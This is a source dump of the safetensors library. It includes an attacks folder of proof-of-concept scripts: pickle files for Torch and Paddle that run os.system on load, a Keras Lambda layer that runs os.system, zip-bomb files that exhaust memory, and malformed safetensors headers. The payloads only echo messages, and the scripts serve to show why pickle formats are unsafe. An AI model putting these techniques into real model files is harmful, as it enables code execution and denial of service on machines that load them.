24 | python tf_ace_create.py
25 | python tf_ace_get_pwned.py
26 | ```
27 |
28 | # Torch Denial of Service (OOM kills the running process)
29 |
30 | Try it out. This will create a seemingly innocuous `torch_dos.pt` file.
31 | ```
32 | python torch_dos_create.py
33 | python torch_dos_get_pwned.py
34 | ```
35 |
36 | # Numpy Denial of Service (OOM kills the running process)
37 |
38 | Try it out. This will create a seemingly innocuous `numpy_dos.npz` file.
39 | ```
40 | python numpy_dos_create.py
41 | python numpy_dos_get_pwned.py
42 | ```
43 |
44 | # Safetensors abuse attempts
45 |
46 | In order to try and check the limits, we also try to abuse the current format.
47 | Please send ideas!
48 |
49 | A few things can be abused:
50 | - Proposal 1: The initial 8 bytes, which could be too big with regard to the file. This crashes, and crashes early (out of bounds) (Attempt #1).
51 | - Proposal 2: The initial header is JSON; an attacker could use a 4GB JSON file to delay the loads. It's debatable how much of an attack this is, but at least
52 | it's impossible to "bomb" (like the DOS attacks above), where the files are vastly smaller than their expanded version (because of zip abuse).
53 | Various "protections" could be put in place, like a header proportion cap (the header should always be far smaller than the file); see the sketch below. (Attempt #2)
54 | - Proposal 3: The offsets could be negative, or point out of the file. This all crashes by default.
55 | - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok.
56 | While testing Proposal 2, I realized that the tensors themselves were all allocated, which gave me an idea for a DOS exploit: a relatively small
57 | file, a few megabytes tops, that defines many tensors on the same overlapping part of the file, is essentially a DOS attack. The mitigation is rather simple: we validate
58 | that the offsets are contiguous and non-overlapping.
59 | - Proposal 5: The offsets could mismatch the declared shapes + dtype. This is validated against.
60 | - Proposal 6: The file being mmapped could be modified while it's open (but if an attacker has access to your filesystem, you're already pwned).
61 | - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). It doesn't mean there isn't a flaw. Same goes for the actual Rust compiled binary.
62 |
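A sketch of the header-size cap mentioned in Proposal 2 (the 100MB figure comes from the main README; this is not the crate's actual code):

```python
MAX_HEADER_BYTES = 100_000_000  # 100MB cap, as described in the main README

def check_header_size(n_header: int, file_size: int) -> None:
    # Reject absurd headers before parsing any JSON.
    if n_header > MAX_HEADER_BYTES:
        raise ValueError("header exceeds the size cap")
    if 8 + n_header > file_size:
        raise ValueError("header claims more bytes than the file contains")
```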
63 | ```
64 | python safetensors_abuse_attempt_1.py
65 | python safetensors_abuse_attempt_2.py
66 | python safetensors_abuse_attempt_3.py
67 | ```
68 |
--------------------------------------------------------------------------------
/attacks/numpy_dos_create.py:
--------------------------------------------------------------------------------
1 | from zipfile import ZIP_DEFLATED, ZipFile
2 |
3 | FILESIZE = 40 * 1000  # 40,000 iterations of the 1 MB buffer below = 40 GB
4 | BUFFER = b"\0" * 1000 * 1000  # 1 MB
5 |
6 | outfilename = "numpy_dos.npz"
7 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
8 | with outzip.open("weights.npy", "w", force_zip64=True) as f:
9 | for i in range(FILESIZE):
10 | f.write(BUFFER)
11 |
--------------------------------------------------------------------------------
/attacks/numpy_dos_get_pwned.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | import numpy as np
4 |
5 | filename = "numpy_dos.npz"
6 |
7 | print(
8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
9 | )
10 | print("Be careful this might crash your computer by reserving way too much RAM")
11 | input("Press Enter to continue")
12 | archive = np.load(filename)
13 | weights = archive["weights"]
14 | assert np.allclose(weights, np.zeros((2, 2)))
15 | print("The file looks fine !")
16 |
--------------------------------------------------------------------------------
/attacks/paddle_ace_create.py:
--------------------------------------------------------------------------------
1 | import paddle
2 | import numpy as np
3 | from collections import OrderedDict
4 |
5 | def _parse_every_object(obj, condition_func, convert_func):
6 | if condition_func(obj):
7 | return convert_func(obj)
8 | elif isinstance(obj, (dict, OrderedDict, list)):
9 | if isinstance(obj, list):
10 | keys = range(len(obj))
11 | else:
12 | keys = list(obj.keys())
13 | for key in keys:
14 | if condition_func(obj[key]):
15 | obj[key] = convert_func(obj[key])
16 | else:
17 | obj[key] = _parse_every_object(
18 | obj[key], condition_func, convert_func
19 | )
20 | return obj
21 | elif isinstance(obj, tuple):
22 | return tuple(
23 | _parse_every_object(list(obj), condition_func, convert_func)
24 | )
25 | elif isinstance(obj, set):
26 | return set(_parse_every_object(list(obj), condition_func, convert_func))
27 | else:
28 | return obj
29 |
30 | # hack _parse_every_object method
31 | paddle.framework.io._parse_every_object = _parse_every_object
32 |
33 | class BadDict(dict):
34 | def __init__(self, src: str, **kwargs):
35 | super().__init__(**kwargs)
36 | self.src = src
37 |
38 | def __reduce__(self):
39 | return (
40 | eval,
41 | (f"os.system('{self.src}') or dict()",),
42 | None,
43 | None,
44 | iter(self.items()),
45 | )
46 |
47 | paddle.save(
48 | [BadDict(
49 | 'echo "pwned your computer, I can do anything I want."',
50 | **{"weight": paddle.zeros((2, 2))},
51 | )],
52 | "paddle_ace.pdparams",
53 | )
54 |
--------------------------------------------------------------------------------
/attacks/paddle_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import paddle
2 |
3 | weights = paddle.load("paddle_ace.pdparams")[0]
4 | assert list(weights.keys()) == ["weight"]
5 | assert paddle.allclose(weights["weight"], paddle.zeros((2, 2)))
6 | print("The file looks fine !")
7 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_1.py:
--------------------------------------------------------------------------------
1 | import torch
2 | from safetensors.torch import load_file, save_file
3 |
4 | filename = "safetensors_abuse_attempt_1.safetensors"
5 |
6 |
7 | def create_payload():
8 | weights = {"weight": torch.zeros((2, 2))}
9 | save_file(weights, filename)
10 |
11 | with open(filename, "r+b") as f:
12 | f.seek(0)
13 | # Now the header claims to be 1000 bytes even though the whole file is much smaller
14 | n = 1000
15 | n_bytes = n.to_bytes(8, "little")
16 | f.write(n_bytes)
17 |
18 |
19 | create_payload()
20 | # This properly crashes with an out of bounds exception.
21 | test = load_file(filename)
22 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_2.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 |
5 | from safetensors.torch import load_file
6 |
7 | filename = "safetensors_abuse_attempt_2.safetensors"
8 |
9 |
10 | def create_payload():
11 | shape = [2, 2]
12 | n = shape[0] * shape[1] * 4
13 |
14 | metadata = {
15 | f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10)
16 | }
17 |
18 | binary = json.dumps(metadata).encode("utf-8")
19 | n = len(binary)
20 | n_header = n.to_bytes(8, "little")
21 |
22 | with open(filename, "wb") as f:
23 | f.write(n_header)
24 | f.write(binary)
25 | f.write(b"\0" * n)
26 |
27 |
28 | create_payload()
29 |
30 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
31 | start = datetime.datetime.now()
32 | test = load_file(filename)
33 | print(f"Loading the file took {datetime.datetime.now() - start}")
34 |
--------------------------------------------------------------------------------
/attacks/safetensors_abuse_attempt_3.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import json
3 | import os
4 |
5 | from safetensors.torch import load_file
6 |
7 | filename = "safetensors_abuse_attempt_3.safetensors"
8 |
9 |
10 | def create_payload():
11 | shape = [200, 200]
12 | n = shape[0] * shape[1] * 4
13 |
14 | metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)}
15 |
16 | binary = json.dumps(metadata).encode("utf-8")
17 | n = len(binary)
18 | n_header = n.to_bytes(8, "little")
19 |
20 | with open(filename, "wb") as f:
21 | f.write(n_header)
22 | f.write(binary)
23 | f.write(b"\0" * n)
24 |
25 |
26 | create_payload()
27 | print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo")
28 | start = datetime.datetime.now()
29 | test = load_file(filename)
30 | print(f"Loading the file took {datetime.datetime.now() - start}")
31 |
--------------------------------------------------------------------------------
/attacks/tf_ace_create.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 |
4 | def exec_(*args, **kwargs):
5 | import os
6 |
7 | os.system('echo "########################################\nI own you.\n########################################"')
8 | return 10
9 |
10 |
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 |
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 |
16 |
17 | ###
18 | # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
19 |
20 | model.save("tf_ace.h5")
21 | ###
22 |
--------------------------------------------------------------------------------
/attacks/tf_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import base64
2 | import json
3 |
4 | import h5py
5 | import tensorflow as tf
6 |
7 | new_model = tf.keras.models.load_model("tf_ace.h5")
8 |
9 | print("Transformers is not vulnerable to this, as it uses h5 directly.")
10 | print("Keras uses a pickled code of the function within the `h5` attrs of the file")
11 | print("Let's show you the marshalled code")
12 |
13 | with h5py.File("tf_ace.h5") as f:
14 | data = json.loads(f.attrs["model_config"])
15 | print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0]))
16 | pass
17 |
--------------------------------------------------------------------------------
/attacks/tf_safe_ace_create.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 |
4 | def exec_(*args, **kwargs):
5 | import os
6 |
7 | os.system('echo "########################################\nI own you.\n########################################"')
8 | return 10
9 |
10 |
11 | num_classes = 10
12 | input_shape = (28, 28, 1)
13 |
14 | model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")])
15 |
16 |
17 | model.save("tf_ace.keras", save_format="keras_v3")
18 |
--------------------------------------------------------------------------------
/attacks/tf_safe_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import tensorflow as tf
2 |
3 | new_model = tf.keras.models.load_model("tf_ace.keras")
4 |
--------------------------------------------------------------------------------
/attacks/torch_ace_create.py:
--------------------------------------------------------------------------------
1 | import torch
2 |
3 |
4 | class BadDict(dict):
5 | def __init__(self, src: str, **kwargs):
6 | super().__init__(**kwargs)
7 | self.src = src
8 |
9 | def __reduce__(self):
10 | return (
11 | eval,
12 | (f"os.system('{self.src}') or dict()",),
13 | None,
14 | None,
15 | iter(self.items()),
16 | )
17 |
18 |
19 | torch.save(
20 | BadDict(
21 | 'echo "pwned your computer, I can do anything I want."',
22 | **{"weight": torch.zeros((2, 2))},
23 | ),
24 | "torch_ace.pt",
25 | )
26 |
--------------------------------------------------------------------------------
/attacks/torch_ace_get_pwned.py:
--------------------------------------------------------------------------------
1 | import torch
2 |
3 | weights = torch.load("torch_ace.pt")
4 | assert list(weights.keys()) == ["weight"]
5 | assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
6 | print("The file looks fine !")
7 |
--------------------------------------------------------------------------------
/attacks/torch_dos_create.py:
--------------------------------------------------------------------------------
1 | import os
2 | from zipfile import ZIP_DEFLATED, ZipFile
3 |
4 | import torch
5 |
6 | FILESIZE = 40 * 1000  # 40,000 iterations of the 1 MB buffer below = 40 GB
7 | BUFFER = b"\0" * 1000 * 1000  # 1 MB
8 |
9 | filename = "torch_dos_tmp.pt"
10 | torch.save({"weight": torch.zeros((2, 2))}, filename)
11 |
12 |
13 | with ZipFile(filename, "r") as torch_zip:
14 | outfilename = "torch_dos.pt"
15 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip:
16 | outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read())
17 | outzip.writestr("archive/version", torch_zip.open("archive/version").read())
18 | with outzip.open("archive/data/0", "w", force_zip64=True) as f:
19 | for i in range(FILESIZE):
20 | f.write(BUFFER)
21 |
22 | os.remove(filename)
23 |
--------------------------------------------------------------------------------
/attacks/torch_dos_get_pwned.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | import torch
4 |
5 | filename = "torch_dos.pt"
6 |
7 | print(
8 | f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine."
9 | )
10 | print("Be careful this might crash your computer by reserving way too much RAM")
11 | input("Press Enter to continue")
12 | weights = torch.load(filename)
13 | assert list(weights.keys()) == ["weight"]
14 | assert torch.allclose(weights["weight"], torch.zeros((2, 2)))
15 | print("The file looks fine !")
16 |
--------------------------------------------------------------------------------
/bindings/python/.gitignore:
--------------------------------------------------------------------------------
1 | /target
2 |
3 | # Byte-compiled / optimized / DLL files
4 | __pycache__/
5 | .pytest_cache/
6 | *.py[cod]
7 |
8 | # C extensions
9 | *.so
10 |
11 | # Distribution / packaging
12 | .Python
13 | .venv/
14 | env/
15 | bin/
16 | build/
17 | develop-eggs/
18 | dist/
19 | eggs/
20 | lib/
21 | lib64/
22 | parts/
23 | sdist/
24 | var/
25 | include/
26 | man/
27 | venv/
28 | *.egg-info/
29 | .installed.cfg
30 | *.egg
31 |
32 | # Installer logs
33 | pip-log.txt
34 | pip-delete-this-directory.txt
35 | pip-selfcheck.json
36 |
37 | # Unit test / coverage reports
38 | htmlcov/
39 | .tox/
40 | .coverage
41 | .cache
42 | nosetests.xml
43 | coverage.xml
44 |
45 | # Translations
46 | *.mo
47 |
48 | # Mr Developer
49 | .mr.developer.cfg
50 | .project
51 | .pydevproject
52 |
53 | # Rope
54 | .ropeproject
55 |
56 | # Django stuff:
57 | *.log
58 | *.pot
59 |
60 | .DS_Store
61 |
62 | # Sphinx documentation
63 | docs/_build/
64 |
65 | # PyCharm
66 | .idea/
67 |
68 | # VSCode
69 | .vscode/
70 |
71 | # Pyenv
72 | .python-version
--------------------------------------------------------------------------------
/bindings/python/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors-python"
3 | version = "0.5.3-dev.0"
4 | edition = "2021"
5 | rust-version = "1.74"
6 |
7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
8 | [lib]
9 | name = "safetensors_rust"
10 | crate-type = ["cdylib"]
11 |
12 | [dependencies]
13 | pyo3 = { version = "0.24", features = ["abi3", "abi3-py38"] }
14 | memmap2 = "0.9"
15 | serde_json = "1.0"
16 |
17 | [dependencies.safetensors]
18 | path = "../../safetensors"
19 |
--------------------------------------------------------------------------------
/bindings/python/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/bindings/python/MANIFEST.in:
--------------------------------------------------------------------------------
1 | include Cargo.toml
2 | include pyproject.toml
3 | include rust-toolchain
4 | include ../../LICENSE
5 | recursive-include src *
6 | recursive-include safetensors-lib *
7 | recursive-exclude safetensors-lib/target *
8 |
--------------------------------------------------------------------------------
/bindings/python/Makefile:
--------------------------------------------------------------------------------
1 | .PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples
2 |
3 | # make sure to test the local checkout in scripts and not the pre-installed one (don't use quotes!)
4 | export PYTHONPATH = src
5 |
6 | check_dirs := tests py_src
7 |
8 | modified_only_fixup:
9 | $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs)))
10 | @if test -n "$(modified_py_files)"; then \
11 | echo "Checking/fixing $(modified_py_files)"; \
12 | black --preview $(modified_py_files); \
13 | isort $(modified_py_files); \
14 | flake8 $(modified_py_files); \
15 | else \
16 | echo "No library .py files were modified"; \
17 | fi
18 |
19 |
20 | quality:
21 | black --check --preview $(check_dirs)
22 | isort --check-only $(check_dirs)
23 | flake8 $(check_dirs)
24 | # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source
25 |
26 | style:
27 | black --preview $(check_dirs)
28 | isort $(check_dirs)
29 |
30 | # Super fast fix and check target that only works on relevant modified files since the branch was made
31 |
32 | fixup: modified_only_fixup
33 |
34 | test:
35 | python -m pytest -n auto --dist=loadfile -s -v ./tests/
36 |
--------------------------------------------------------------------------------
/bindings/python/README.md:
--------------------------------------------------------------------------------
1 | ## Installation
2 |
3 | ```
4 | pip install safetensors
5 | ```
6 |
7 |
8 | ## Usage
9 |
10 | ### Numpy
11 |
12 | ```python
13 | from safetensors.numpy import save_file, load_file
14 | import numpy as np
15 |
16 | tensors = {
17 | "a": np.zeros((2, 2)),
18 | "b": np.zeros((2, 3), dtype=np.uint8)
19 | }
20 |
21 | save_file(tensors, "./model.safetensors")
22 |
23 |
24 | # Now loading
25 | loaded = load_file("./model.safetensors")
26 | ```
27 |
28 | ### Torch
29 |
30 | ```python
31 | from safetensors.torch import save_file, load_file
32 | import torch
33 |
34 | tensors = {
35 | "a": torch.zeros((2, 2)),
36 | "b": torch.zeros((2, 3), dtype=torch.uint8)
37 | }
38 |
39 | save_file(tensors, "./model.safetensors")
40 |
41 |
42 | # Now loading
43 | loaded = load_file("./model.safetensors")
44 | ```
45 |
46 | ### Developing
47 |
48 | ```
49 | # inside ./safetensors/bindings/python
50 | pip install .[dev]
51 | ```
52 | This should be enough to install this library locally.
53 |
54 | ### Testing
55 |
56 | ```
57 | # inside ./safetensors/bindings/python
58 | pip install .[dev]
59 | pytest -sv tests/
60 | ```
61 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_flax.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import jax.numpy as jnp
5 | from flax.serialization import msgpack_restore, msgpack_serialize
6 | from safetensors.flax import load_file, save_file
7 |
8 |
9 | def create_gpt2(n_layers: int):
10 | tensors = {}
11 | tensors["wte"] = jnp.zeros((50257, 768))
12 | tensors["wpe"] = jnp.zeros((1024, 768))
13 | for i in range(n_layers):
14 | tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,))
15 | tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,))
16 | tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024))
17 | tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304))
18 | tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304))
19 | tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768))
20 | tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768))
21 | tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768))
22 | tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768))
23 | tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072))
24 | tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072))
25 | tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768))
26 | tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768))
27 | tensors["ln_f.weight"] = jnp.zeros((768))
28 | tensors["ln_f.bias"] = jnp.zeros((768))
29 | return tensors
30 |
31 |
32 | def load(filename):
33 | with open(filename, "rb") as f:
34 | data = f.read()
35 | flax_weights = msgpack_restore(data)
36 | return flax_weights
37 |
38 |
39 | def test_flax_flax_load(benchmark):
40 | # benchmark something
41 | weights = create_gpt2(12)
42 | with tempfile.NamedTemporaryFile(delete=False) as f:
43 | serialized = msgpack_serialize(weights)
44 | f.write(serialized)
45 | result = benchmark(load, f.name)
46 | os.unlink(f.name)
47 |
48 | for k, v in weights.items():
49 | tv = result[k]
50 | assert jnp.allclose(v, tv)
51 |
52 |
53 | def test_flax_sf_load(benchmark):
54 | # benchmark something
55 | weights = create_gpt2(12)
56 | with tempfile.NamedTemporaryFile(delete=False) as f:
57 | save_file(weights, f.name)
58 | result = benchmark(load_file, f.name)
59 | os.unlink(f.name)
60 |
61 | for k, v in weights.items():
62 | tv = result[k]
63 | assert jnp.allclose(v, tv)
64 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_mlx.py:
--------------------------------------------------------------------------------
1 | import os
2 | import platform
3 | import tempfile
4 |
5 |
6 | if platform.system() == "Darwin":
7 | import mlx.core as mx
8 | from safetensors.mlx import load_file, save_file
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = mx.zeros((50257, 768))
13 | tensors["wpe"] = mx.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768))
22 | tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768))
23 | tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768))
28 | tensors["ln_f.weight"] = mx.zeros((768))
29 | tensors["ln_f.bias"] = mx.zeros((768))
30 | return tensors
31 |
32 | def load(filename):
33 | return mx.load(filename)
34 |
35 | def test_mlx_mlx_load(benchmark):
36 | # benchmark something
37 | weights = create_gpt2(12)
38 | with tempfile.NamedTemporaryFile(delete=False) as f:
39 | filename = f"{f.name}.npz"
40 | mx.savez(filename, **weights)
41 | result = benchmark(load, filename)
42 | os.unlink(f.name); os.unlink(filename)  # remove both the tmp file and the .npz actually written
43 |
44 | for k, v in weights.items():
45 | tv = result[k]
46 | assert mx.allclose(v, tv)
47 |
48 | def test_mlx_sf_load(benchmark):
49 | # benchmark something
50 | weights = create_gpt2(12)
51 | with tempfile.NamedTemporaryFile(delete=False) as f:
52 | save_file(weights, f.name)
